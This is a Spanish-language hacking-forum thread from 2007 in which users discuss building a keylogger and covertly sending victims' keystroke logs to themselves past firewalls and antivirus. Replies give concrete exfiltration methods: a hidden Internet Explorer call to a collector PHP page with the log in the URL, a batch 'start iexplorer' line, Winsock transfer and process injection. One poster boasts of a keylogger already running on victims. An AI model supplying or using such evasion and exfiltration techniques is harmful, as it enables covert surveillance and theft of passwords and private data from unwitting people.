Necesito ideas (formas) de transferir un log sin ser detectado.

Iniciado por Scratz, 22 Abril 2007, 17:16 PM

0 Miembros y 1 Visitante están viendo este tema.

Scratz

Hola amigos.

Quiero hacer un keylogger, ya buscaré algunos ejemplos. Pero sé que me encontraré con una fase un tanto complicada; la transferencia del log de la víctima.

La puedo subir por ftp a un servidor y luego descargarla, pero los antivirus/firewalls lo detectarán. También me la puedo enviar por email con Winsock... pero tmb lo detectarán. Una idea que tuve  fue que el keylogger crease un ftp.bat y lo ejecutase (así se enviaría desde la consola de MS-DOS) pero me parece que lo probé y me saltaba hasta el firewall de Güindows.

Un buen método que ya usé alguna vez consistía en extraer el username/password de un programa leyendo en unas determinadas direcciones (obtenibles con Tsearch) de la memoria. Luego, hacía que la víctima me enviase el username/password cifrados por una conversación del MSN.
Pero en esta ocasión, ese método no me sirve.

Oí hablar de que se podía usar IE para enviar datos, pero no se como.

A ver si a alguien se le ocurre alguna idea de burlar los firewalls que no sea desactivandolos (por que el usuario se dará cuenta).

Gracias de antemano.
\\... The Revolution Is Comming ...//

Hans el Topo

cuando el usuario ande navegando por internet, que se conecte a alguna página (envie alguna variable con la info) y listo xD

por supuesto deberías tener tu esa pag configurada para que absorba los datos y redireccione rapidamente a otro sitio o cualquier cosa que se te ocurra xD

(un popup nunca levanta sospecha, eso si no estes todo el rato haciendolo xD)
 

Scratz

Yo lo que necesito es transferir los datos, ya me las apañaré para conseguirlos. Gracias de todos modos.

Por cierto... un .php puede enviar un archivo por ftp? Lo que si que se puede es, desde flash (que el firewall no bloquea), enviar datos. Voy a seguir investigando. A ver si alguien me puede ayudar.
\\... The Revolution Is Comming ...//

yovaninu

mi keylogger instalado en las distintas victimas genera un archivo con las teclas pulsadas, éstas estan un poco cifradas para casos en que alguien los pueda abrir, pues son de texto plano, ahora para transferirlos desde la victima hasta mi PC lo hago como si de un archivo cualquiera se tratara via WinSock y no salta nada de nada, hasta ahora todo va bien y con absoluta normalidad.

~~

Cita de: yovaninu en 22 Abril 2007, 20:39 PM
mi keylogger instalado en las distintas victimas genera un archivo con las teclas pulsadas, éstas estan un poco cifradas para casos en que alguien los pueda abrir, pues son de texto plano, ahora para transferirlos desde la victima hasta mi PC lo hago como si de un archivo cualquiera se tratara via WinSock y no salta nada de nada, hasta ahora todo va bien y con absoluta normalidad.

Eso con el fw del win  :xD :xD un fw un poco decente saltaria.
Para saltarlos necesitarias inyectar tu proceso, y ni aveces con esas se puede...
Para inyectarlo no puedes usar VB, eso si

Hans el Topo

Cita de: Scratz en 22 Abril 2007, 20:28 PM
Yo lo que necesito es transferir los datos, ya me las apañaré para conseguirlos. Gracias de todos modos.


y que te he dicho? xD



 

MazarD

Haces que tu programa lance el iexplore de forma oculta así:
iexplore.exe [url="http://tuweb.com/pillalogs.php?log="tusdatosblabla""]http://tuweb.com/pillalogs.php?log="tusdatosblabla"[/url]
Luego tu php que guarde esa variable en un archivo y listo.

La mayoría de firewalls no lo pillan, pero hay bastantes que si. Para que no te cace ningún firewall el único método realmente efectivo es la inyección.
-Learn as if you were to live forever, live as if you were to die tomorrow-

http://www.mazard.info
http://twitter.com/MazarD
irc://irc.freenode.org/elhacker.net

Scratz

Cita de: MazarD en 23 Abril 2007, 16:28 PM
Haces que tu programa lance el iexplore de forma oculta así:
iexplore.exe [url="http://tuweb.com/pillalogs.php?log="tusdatosblabla""]http://tuweb.com/pillalogs.php?log="tusdatosblabla"[/url]
Luego tu php que guarde esa variable en un archivo y listo.

La mayoría de firewalls no lo pillan, pero hay bastantes que si. Para que no te cace ningún firewall el único método realmente efectivo es la inyección.

Gracias MazarD, pero no tendrás algún ejemplo de eso de "lanzar el iexplorer con esa web de forma oculta". Por que no tengo mucha idea. Sobre lo del php ya me las arreglaré, pero eso de lanzar el iexplorer oculto me interesa.
\\... The Revolution Is Comming ...//

dimitrix

en bat

@start iexplorer.exe http://....

en vb sera casi igual

shell....


hay una forma q es indetectable pero un poco brusca es que cree una web en html que al ser ejecutada se te envien los datos y luego se cierre automatic.




Scratz

Cita de: dimitrix1 en 23 Abril 2007, 18:56 PM
en bat

@start iexplorer.exe http://....

en vb sera casi igual

shell....


hay una forma q es indetectable pero un poco brusca es que cree una web en html que al ser ejecutada se te envien los datos y luego se cierre automatic.

Gracias, pero no sé como hacer que no sea visible el iexplore. En cuanto a lo de transferir, haré que se cargue un .php que me envie los datos por ftp. Supongo que eso es indetectable ¿no?
\\... The Revolution Is Comming ...//